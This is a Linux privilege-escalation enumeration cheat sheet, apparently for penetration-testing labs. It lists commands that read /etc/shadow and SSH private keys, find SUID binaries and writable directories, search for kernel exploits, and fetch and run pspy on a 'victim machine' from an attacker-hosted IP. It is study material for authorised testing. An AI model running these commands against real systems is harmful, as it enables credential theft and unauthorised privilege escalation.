Linux

Online Resource

Points of Interest

Sudo Things

sudo -l
sudo -V | grep -i "sudo ver"

System Information

Basic system information: uname -a
CPU information: lscpu
Disk information: lsblk
USB information: lsusb
Kernel Version: cat /etc/issue

Network: ss -nltp

User Roles

id
groups

Crontab

crontab -l
cat /etc/crontab

ls -lah /etc/cron.*
grep -i "CRON" /var/log/syslog

Special Bits

find / -perm -u=s -type f 2>/dev/null
getcap -r / 2>/dev/null
/usr/sbin/getcap -r / 2>/dev/null

Interesting Files

cat /etc/passwd
cat /etc/shadow
cat /etc/hosts
ls -la /var/www
ls -la /opt

cat /root/.ssh/authorized_keys
cat /root/.ssh/id_rsa
cat /home/<user>/.ssh/id_rsa
cat /home/<user>/.ssh/id_ecdsa
cat /home/<user>/.ssh/authorized_keys

find / -name config.php -type f 2>/dev/null
find / -name doas.conf -type f 2>/dev/null
find / -name apache* -type d 2>/dev/null

find / -name *.txt -type f 2>/dev/null
find / -name *.sh -type f 2>/dev/null
find / -name .ht* -type f 2>/dev/null

find / -name id_rsa -type f 2>/dev/null
find / -name id_ecdsa -type f 2>/dev/null
find / -name authorized_keys -type f 2>/dev/null

find /home/ -name local.txt -type f 2>/dev/null
find /root/ -name proof.txt -type f 2>/dev/null
find / -name local.txt -type f 2>/dev/null
find / -name proof.txt -type f 2>/dev/null

Writable Directories

find / -writable -type d 2>/dev/null

Catch Repeating Processes

watch -n 1 "ps aux"
watch -n 1 "ps aux | grep -i <keyword>"

while sleep 1; do ps aux; done
while sleep 1; do ps aux | grep -i <keyword>; done

Monitoring Processes with PsPy

On Kali Machine:
 wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
 python3 -m http.server 80
 
On Victim Machine:
 wget https://192.168.45.200/pspy64 && chmod +x pspy64
 ./pspy64

Reading Binaries

strings <file>

Finding Kernel Exploits

SearchSploit:
    searchploit <keyword>
    searchsploit -m <EDB-ID>

For Kernal Vulnerabilities:
    searchsploit "linux kernel <distro version> Local Privilege Escalation" | grep "<kernel versions>"
    
    <distro version> = cat /etc/issue
    <kernel versions> = uname -r
    
    Example: searchsploit "linux kernel Ubuntu 16 Local Privilege Escalation" | grep "4." | grep -v "< 4.4.0" | grep -v “4.8”

Automated Enumeration

LinPeas

On the Attacker:
    /usr/share/peass/linpeas/linpeas.sh
    /usr/share/peass/linpeas/linpeas_small.sh
    wget https://github.com/peass-ng/PEASS-ng/releases/download/20250106-5a706ae2/linpeas.sh
    
Transfer the respective executable onto compromised system
Run the executable and enumerate the output

Last updated